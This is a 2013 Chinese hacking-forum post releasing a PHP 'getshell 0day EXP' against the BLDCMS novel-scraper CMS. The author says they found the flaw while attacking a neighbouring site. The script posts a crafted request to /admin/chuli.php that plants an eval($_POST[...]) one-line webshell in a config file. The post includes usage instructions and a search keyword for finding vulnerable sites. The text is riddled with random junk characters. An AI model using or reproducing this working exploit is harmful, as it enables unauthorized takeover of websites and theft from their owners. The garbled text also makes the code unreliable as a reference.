之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞& T, M4 C# {1 z9 t
( C* D$ G1 ?( N' _; l ) O: [) x) ]; m2 |5 l
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
! O* N. B9 |+ _ ' r9 g. r9 w7 H$ w: ^3 O
既然都有人发了 我就把我之前写好的EXP放出来吧' o5 U: t$ v3 {8 J4 a% P
5 I _3 i! v$ G, y2 c# C, I0 `view source print?01.php;">7 Z# R, q( w9 t3 F" b
02.<!--?php! {8 A6 c' ~8 i: d% y# {
03.echo "------------------------------------------------------------------- t7 O* I4 P- d; f, E$ c+ G S5 Q
04.
2 G9 X9 y; [* O' m9 E! U5 S0 ~2 n05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
' u$ S4 x* f- X06.
3 m1 @: t. B9 I07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
! c4 f$ b/ J- n# Y, M08.
. c5 Q3 P, g' U# a3 r; ]09.QQ:981009941\r\n 2013.3.21\r\n
+ ?! T$ @( z9 e10. m7 g+ g1 P/ @
11. ) v1 F% T- O3 v$ K0 J* e$ K+ v
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码* I* k" `3 y' x: k* w8 N
13. Y6 | s$ s3 A
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------5 |; M) j t \$ ~
15.
" \: y( _# v4 W16.--------------------------------------------------------------------\r\n";" j, N! T: y7 Z1 V6 _. e" `
17.$url=$argv[1];
% j: ?$ ` j, @% b/ r2 [18.$dir=$argv[2];
9 f1 c8 Y n* c+ c19.$pass=$argv[3];
+ b1 p K& L. t5 r+ f2 U% N20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';; r M9 ~; x: C4 A8 S/ Q: X" o1 G
21.if (emptyempty($pass)||emptyempty($url))! G9 k5 h6 F$ R+ g- F
22.{exit("请输入参数");}
/ r6 K" R1 ]9 y4 o23.else
" {$ E+ o: U" X0 b; a24.{/ O+ f9 E. W2 E' X. \) z
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
" u y" z' X1 k0 o& x x6 J4 |) j9 V26.
" ^7 F+ G' e. l: R2 w27.al;6 j6 X9 R) Q, a! l0 z; L8 H
28.$length = strlen($fuckdata);
3 H @; K% a& h3 L; w; T g29.function getshell($url,$pass)
: M# U* \' Y" w$ h* X% @3 v30.{; H; s& b1 A# z, P+ o
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
0 m! {4 I. S% f1 z$ }32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
" D! r0 L- s3 H+ d/ R* u* s$ T33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
3 s0 \8 R! L' C8 C34.$header .= "User-Agent: MSIE\r\n";
6 L+ i4 r7 k- Y& N' V35.$header .= "Host:".$url."\r\n";
7 j$ @: B& y% a, E36.$header .= "Content-Length: ".$length."\r\n";
# @, n' [: L1 p, F/ y3 h( b$ Z37.$header .= "Connection: Close\r\n";9 E. `5 Q6 ^5 c& S0 N- a: ]8 ^! r
38.$header .="\r\n";
6 m# C8 ]( ~9 n/ p7 E# C# F( ~; _39.$header .= $fuckdata."\r\n\r\n";
3 J2 v2 `. z, K' p6 Z40.$fp = fsockopen($url, 80,$errno,$errstr,15);; B5 R( i# k4 m7 l7 Y( d( {
41.if (!$fp)
* C3 i6 v2 {% E$ X1 N P42.{
8 u3 x# B9 s8 ^ G M43.exit ("利用失败:请检查指定目标是否能正常打开");
" k3 G$ w1 D# U! N44.}$ [3 @3 {3 k: ~( M
45.else{ if (!fputs($fp,$header))
4 h; L! F. D2 G/ R+ T$ ]. ^46.{exit ("利用失败");}
8 ]( a3 t# A+ ~, S* `47.else6 P! I: c4 K7 H" _& C2 H
48.{) g1 Q4 S8 @) `2 I
49.$receive = '';. ~$ t+ Z2 ^$ |7 P- s) m) N
50.while (!feof($fp)) {
! u& U; T5 m2 O2 }! f51.$receive .= @fgets($fp, 1000);
- E6 Q8 k1 F5 G* h T- P52.}: z5 X E2 b6 S B
53.@fclose($fp);
! Z9 V( m4 O, k) ?0 A3 c. u54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标5 `/ b0 P* r$ c* ]3 X8 @
55.
( j& J1 O+ S* Y0 F9 v9 k4 N0 \56.GPC是否=off)";5 S1 s- g5 N7 d7 c
57.}}0 H( q- }. ~' [; \
58.}
2 r& l: {8 c! y59.}& x+ v1 t# C2 q* c
60.getshell($url,$pass);
1 _* f& w: g- ?/ |1 R61.?-->/ n% }6 j1 D7 Y4 S7 u1 F7 T. [. F
8 R" Y* b8 F; X: Z! |! ]
, p& C: ~. N+ f. d
7 J5 e2 e+ ?- ^4 u; R) Wby 数据流
- [1 Y I# F, z2 k0 L8 v |
发表于 2013-3-26 20:49:10
收藏
支持
反对